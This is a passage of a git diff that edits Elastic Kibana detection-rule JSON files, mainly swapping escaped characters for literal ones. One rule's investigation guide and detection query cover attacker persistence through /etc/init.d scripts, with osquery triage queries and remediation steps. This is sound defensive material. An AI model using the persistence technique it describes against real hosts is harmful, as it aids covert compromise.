into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through init.d Detected\n\nThe `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown.\n\nAttackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory.\n\nThis rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the maliciously created service/init.d files or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : /etc/init.d/* and not process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"dnf\" or \"chef-client\" or \"apk\" or \"yum\" or \n\"rpm\" or \"vmis-launcher\" or \"exe\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json index 72e7669ab0f..530d48a40ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json index 66de1d41376..dc73573878b 100644 --- a/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json +++ b/packages/security_detection_engine/kibana/security_rule/475b42f0-61fb-4ef0-8a85-597458bfb0a1_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json index 2052ae61bc5..80324d6070d 100644 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_105.json @@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Elastic", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json index 4b336c35b08..890dd9538e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_106.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json index 044747a14b6..57d41980f88 100644 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_107.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -95,7 +95,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json index 40f2039d5d9..f5ac14db371 100644 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_108.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```", + "setup": "The 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json index 322645b1d39..c1410309262 100644 --- a/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json +++ b/packages/security_detection_engine/kibana/security_rule/47e22836-4a16-4b35-beee-98f6c4ee9bf2_109.json @@ -59,7 +59,7 @@ ], "risk_score": 47, "rule_id": "47e22836-4a16-4b35-beee-98f6c4ee9bf2", - "setup": "\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nLogon/Logoff \u003e\nSpecial Logon (Success)\n```\n", + "setup": "\nThe 'Audit Detailed File Share' audit policy is required be configured (Success) on Domain Controllers and Sensitive Windows Servers.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success)\n```\n\nThe 'Special Logon' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nLogon/Logoff >\nSpecial Logon (Success)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json index 2bf2b292b3f..0dda72ab3ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json index 40fdee02703..9caacf075b6 100644 --- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_103.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json index a091deb60a3..9aa8e5d7614 100644 --- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json index b3571d66789..cba2eae48a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json +++ b/packages/security_detection_engine/kibana/security_rule/47f76567-d58a-4fed-b32b-21f571e28910_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json index 6a1ffb96318..be1be2b979a 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_102.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json index 06a66e4d0fe..8027aaba455 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_103.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json index 505be2b9dac..3ec1c902d98 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_104.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "483c4daf-b0c6-49e0-adf3-0bfa93231d6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json b/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json index 50992e85642..4ec4c41394f 100644 --- a/packages/security_detection_engine/kibana/security_rule/483c4daf-b0c6-49e0-adf3-0bfa93231d6b_105.json +++ 